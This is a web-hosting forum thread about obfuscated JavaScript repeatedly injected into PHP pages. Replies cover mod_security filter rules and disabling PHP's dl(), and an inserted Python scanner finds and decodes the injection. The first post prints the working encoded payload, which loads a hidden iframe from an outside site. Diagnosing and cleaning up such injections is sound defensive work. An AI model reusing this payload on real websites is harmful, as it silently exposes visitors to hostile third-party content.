  1. #1
    Member mousepotatoe's Avatar
    Join Date
    Dec 2003
    Posts
    36

    Default Recurring PHP malicious document.write exploit

    On my server, several sites but not all sites are having this code inserted into php pages, mainly index.php header.php or footer.php

    I cannot locate the source of this exploit.

    Is anyone familiar with this? Code follows:

    Code:
    <script language=javascript>
    document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%73%65%6C%66%2E%66%6F%63%75%73%28%29%3B%73%65%74%49%6E%74%65%72%76%61%6C%28%22%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%27%47%6F%6F%67%6C%65%2E%63%6F%6D%27%22%2C%37%29%3B%7D%3C%2F%73%63%72%69%70%74%3E%0D%0A'));dF('%286FLIUDPH%2853%2853vuf%286G%2855kwws%286D22zzz1vn%7Cv1frp2nlso1sks%2855%2853zlgwk%286G5%2853khljkw%286G5%2853vw%7Coh%286G%2855glvsod%7C%286Dqrqh%2855%286H%286F2LIUDPH%286H3')
    </script>
    Any help would be greatly appreciated.
    Hardware (härdwâr)n.
    The parts of a computer you can kick

    Software (softwâr)n.
    1. The parts of a computer you can only cuss at.
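To see what the injected block actually does, here is an added example (not code from the thread) that scans a web root for this exact injection and reproduces the dF() decoding in Python. SAMPLE_PAYLOAD is the dF() argument copied from the post above; the regex, the file layout and the run_demo() sample tree are my assumptions.

```python
import os
import re
import tempfile
from urllib.parse import unquote

# The injected block as shown in the post: document.write(unescape('<hex>'));dF('<payload>')
INJECT_RE = re.compile(
    r"<script language=javascript>\s*document\.write\(unescape\('([^']*)'\)\);"
    r"\s*dF\('([^']*)'\)\s*</script>", re.IGNORECASE | re.DOTALL)

# The dF() argument copied from the first post; the outer blob is plain percent-encoding.
SAMPLE_PAYLOAD = (
    "%286FLIUDPH%2853%2853vuf%286G%2855kwws%286D22zzz1vn%7Cv1frp2nlso1sks%2855"
    "%2853zlgwk%286G5%2853khljkw%286G5%2853vw%7Coh%286G%2855glvsod%7C%286Dqrqh"
    "%2855%286H%286F2LIUDPH%286H3")

def decode_df(payload):
    """Mirror dF(): the last char is a shift, the rest is percent-decoded, each
    char code is reduced by the shift, and the result is percent-decoded again."""
    shift = int(payload[-1])
    stage1 = unquote(payload[:-1])
    return unquote("".join(chr(ord(c) - shift) for c in stage1))

def scan_file(path):
    """Return the decoded dF() payload if the file carries the injection, else None."""
    with open(path, encoding="latin-1") as fh:
        match = INJECT_RE.search(fh.read())
    return decode_df(match.group(2)) if match else None

def scan_tree(root, exts=(".php",)):
    """Walk root; return (path, mtime, decoded payload) for each infected file.
    The mtime is what you correlate against access/FTP logs to find the entry point."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower().endswith(exts):
                decoded = scan_file(path)
                if decoded is not None:
                    hits.append((path, os.path.getmtime(path), decoded))
    return hits

def run_demo():
    """Constructed sample tree (assumption): an infected index.php with the outer blob
    abbreviated, beside a clean file. Returns the scan_tree() hits."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php include 'header.php'; ?>\n<script language=javascript>\n"
                 "document.write(unescape('%3C%73%63%72%69%70%74%3E'));dF('"
                 + SAMPLE_PAYLOAD + "')\n</script>\n")
    with open(os.path.join(root, "clean.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    return scan_tree(root)
```

On the post's own payload the decoder yields a 2x2 IFRAME with style="display:none" that loads an external URL, i.e. every visitor of the defaced pages was silently pulled to a third-party site. Run scan_tree() against the real document roots to list every infected file together with its modification time.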

  2. #2
    Member
    Join Date
    Oct 2004
    Location
    New Jersey, USA
    Posts
    160

    Default

    I'd suggest mod_security, and my mod security ruleset that contains things to block such as this - http://www.hostmerit.com/modsec.user.conf


    To block those with modsec,
    SecFilter "document\.write"
    SecFilterSelective THE_REQUEST "<script>"

    My script contains around 30+ Javascript + XML cross site scripting code blocks.
    -Kris
    HostMerit
    'Web Hosting on Your Terms'

  3. #3
    Member
    Join Date
    Sep 2004
    Posts
    422

    Default

    Mod security will block the requests that you filter, but the real issue is probably that the malicious php module is still being loaded via the dl() function.

    Just edit your php.ini file and change

    enable_dl = yes

    to
    enable_dl = no

    And restart apache - the problem won't reoccur then.

  4. #4
    Member
    Join Date
    Oct 2002
    Posts
    751

    Default

    Quote Originally Posted by DigitalN
    enable_dl = yes

    to
    enable_dl = no

    And restart apache - the problem won't reoccur then.
    Shouldn't it be:

    enable_dl = On
    enable_dl = Off

  5. #5
    Member mousepotatoe's Avatar
    Join Date
    Dec 2003
    Posts
    36

    Default

    Quote Originally Posted by HostMerit
    I'd suggest mod_security, and my mod security ruleset that contains things to block such as this - http://www.hostmerit.com/modsec.user.conf


    To block those with modsec,
    SecFilter "document\.write"
    SecFilterSelective THE_REQUEST "<script>"

    My script contains around 30+ Javascript + XML cross site scripting code blocks.
    That's a wonderful mod_security ruleset, and thank you for writing the lines:

    SecFilter "document\.write"
    SecFilterSelective THE_REQUEST "<script>"

    I have added this to my modsec ruleset, but the malicious code is creating
    "<script language=javascript>"

    would this mod_security recognize <script language=javascript> as <script> ?

    Thanks!

  6. #6
    Member mousepotatoe's Avatar
    Join Date
    Dec 2003
    Posts
    36

    Default enable_dl = no blocks ioncube

    Quote Originally Posted by DigitalN
    Mod security will block the requests that you filter, but the real issue is probably that the malicious php module is still being loaded via the dl() function.

    Just edit your php.ini file and change

    enable_dl = yes

    to
    enable_dl = no

    And restart apache - the problem won't reoccur then.
    If I change enable_dl = no all my ioncube sites go down, will not allow ioncube to load any of my ioncube encrypted sites. Is there a workaround for this?

    Thank you!

  7. #7
    Member Etheral's Avatar
    Join Date
    Dec 2003
    Posts
    210

    Default

    Quote Originally Posted by mousepotatoe
    That's a wonderful mod_security ruleset, and thank you for writing the lines:

    SecFilter "document\.write"
    SecFilterSelective THE_REQUEST "<script>"

    I have added this to my modsec ruleset, but the malicious code is creating
    "<script language=javascript>"

    would this mod_security recognize <script language=javascript> as <script> ?

    Thanks!

    you might NOT want to block javascript like that, some people use javascript to give their website a more interactive feel...
    +P 6145153533
    +eMail nikk.spiert[@]gmail.com
    +AIM IAEtheral

  8. #8
    Member
    Join Date
    Mar 2006
    Posts
    27

    Default

    Quote Originally Posted by mousepotatoe
    If i change enable_dl = no all my ioncube sites go down, will not allow ioncube to load any of my ioncube encrypted sites. Is there a workaround for this?

    Thank you!
    You can load the ioncube loaders within php.ini see the bottom of http://www.ioncube.com/loader_installation.php under "Manual Installation in the php.ini File", then you can disable dl.

  9. #9
    Member
    Join Date
    Oct 2004
    Location
    New Jersey, USA
    Posts
    160

    Default

    Quote Originally Posted by Etheral
    you might NOT want to block javascript like that, some people use javascript to give their website a more interactive feel...
    You have no idea what you're talking about. I suggest you find out what mod_security is, and why the comment you made makes no sense. It blocks URL requests, not page code.

  10. #10
    Member
    Join Date
    Sep 2004
    Posts
    422

    Default

    Yes,

    enable_dl = Off

    Is what you want - I was working from memory, it's as simple as that to disable this exploit.

    Enabling dl() makes your server vulnerable to any account loading a rogue module into php - load ioncube and any other legitimate modules (such as sourceguardian) into php.ini yourself, as someone mentioned.

  11. #11
    Member mousepotatoe's Avatar
    Join Date
    Dec 2003
    Posts
    36

    Default Disabled dl() and can't run source guardian

    Disabling the dl() function is wreaking havoc on many of my websites. I had to load ioncube into the php.ini and got past that, and have added source guardian to php.ini but am getting the following error.

    One or more errors are fatal due to the fact that they disable the ability to load the Source Guardian loader:
    Your system has the "dl()" function diabled.
    This error is fatal and will prevent you from using this plugin. To access the rest of your plugins remove this plugin from your server.
    I have tried

    [Zend]
    extension=/home/ixed/ixed.4.4.lin
    zend_extension = /home/ioncube/ioncube_loader_lin_4.4.so
    zend_optimizer.optimization_level=15
    zend_extension_manager.optimizer=/usr/local/Zend/lib/Optimizer-2_6_2
    zend_extension_manager.optimizer_ts=/usr/local/Zend/lib/Optimizer_TS-2_6_2
    zend_optimizer.version=2.6.2
    and
    extension=/home/ixed/ixed.4.4.lin
    [Zend]
    zend_extension = /home/ioncube/ioncube_loader_lin_4.4.so
    zend_optimizer.optimization_level=15
    zend_extension_manager.optimizer=/usr/local/Zend/lib/Optimizer-2_6_2
    zend_extension_manager.optimizer_ts=/usr/local/Zend/lib/Optimizer_TS-2_6_2
    zend_optimizer.version=2.6.2
    with no luck.
    Any suggestions?

    Thank you
